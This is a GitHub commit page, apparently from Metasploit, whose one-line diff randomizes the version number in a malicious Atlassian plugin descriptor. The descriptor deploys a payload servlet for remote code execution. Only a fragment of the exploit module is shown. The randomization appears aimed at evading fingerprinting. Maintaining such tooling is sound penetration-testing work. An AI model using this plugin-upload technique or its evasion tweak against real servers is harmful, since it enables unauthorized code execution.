Skip to content

Commit

Permalink
randomize the plugins version number
Browse files Browse the repository at this point in the history
  • Loading branch information
sfewer-r7 committed Oct 17, 2023
1 parent 415bd49 commit 0fc35bf
Showing 1 changed file with 1 addition and 1 deletion.
Original file line number Diff line number Diff line change
Expand Up @@ -213,7 +213,7 @@ def exploit
<atlassian-plugin name="#{rand_text_alpha(8)}" key="#{plugin_key}" plugins-version="2">
<plugin-info>
<description>#{rand_text_alphanumeric(8)}</description>
<version>1.0</version>
<version>#{rand(1024)}.#{rand(1024)}</version>
</plugin-info>
<servlet key="#{rand_text_alpha(8)}" class="metasploit.PayloadServlet">
<url-pattern>#{normalize_uri(payload_endpoint)}</url-pattern>
Expand Down

0 comments on commit 0fc35bf

Please sign in to comment.